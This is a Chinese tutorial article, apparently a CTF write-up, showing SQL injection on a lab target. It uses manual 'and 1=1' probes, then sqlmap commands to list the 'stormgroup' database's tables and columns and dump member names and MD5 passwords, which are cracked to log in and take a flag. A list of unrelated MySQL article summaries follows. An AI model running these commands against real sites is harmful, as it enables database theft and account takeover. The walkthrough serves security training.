sqlmap注入图文详解
更新时间:2021年08月11日 15:18:43 作者:徐林2333
sqlmap 是一个自动SQL 射入工具。本文收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,希望能给你带来帮助
1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。
地址栏输入 and 1=1 发现页面正常显示。
再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞
2.现在拿出我们的kali工具,sqlmap进行注入测试。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs
3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables
4.接下来查一下member中存在哪些列。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns
5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。
6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里
7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。
8.END 登录成功,拿到flag,提交。Gameover !
总结
本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注脚本之家的更多内容!
相关文章
Windows下MySQL服务启动常见的两种方式(适配5.7和8.0)
本文主要介绍了Windows下MySQL服务启动常见的两种方式(适配5.7和8.0),文中通过图文介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2024-07-07
这篇文章主要介绍了MySQL Workbench的使用方法(图文) ,需要的朋友可以参考下2016-02-02
浅析centos 7 mysql-8.0.19-1.el7.x86_64.rpm-bundle.tar
这篇文章主要介绍了centos 7 mysql-8.0.19-1.el7.x86_64.rpm-bundle.tar的相关知识,需要的朋友可以参考下2020-01-01
MySQL5.1主从同步出现Relay log read failure错误解决方法
这篇文章主要介绍了MySQL5.1主从同步出现Relay log read failure错误解决方法,需要的朋友可以参考下2014-07-07
对MySQL 如何查找删除重复行好奇得小伙伴想必也知道MySQL 操作删除重复行,难免有时会需要查看被删除的重行,今天小编就来给大家详解,感兴趣的小伙伴可以参考下面的文章内容2021-09-09
Ubuntu 18.04配置mysql以及配置远程连接的步骤
这篇文章主要给大家介绍了关于Ubuntu 18.04配置mysql以及配置远程连接的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2018-07-07
在本篇文章中我们给大家讲述了mysql中影响性能的因素以及相关知识点内容,有兴趣的朋友参考下。2018-09-09
随着应用对事务完整性和并发性要求的不断提高,MySQL才开始开发基于事务的存储引擎,下面这篇文章主要给大家介绍了关于MySQL表锁、行锁、排它锁及共享锁使用的相关资料,需要的朋友可以参考下2022-04-04
mysql5.7及mysql 8.0版本修改root密码的方法小结
这篇文章主要介绍了mysql5.7及mysql 8.0版本修改root密码方式 ,非常不错,具有一定的参考借鉴价值,需要的朋友可以参考下2018-11-11
对于在开发大型电子商务网站时,如果碰到有限的硬件和系统环境情况下,合理的数据库表结构的设计是必不可少的2014-05-05
最新评论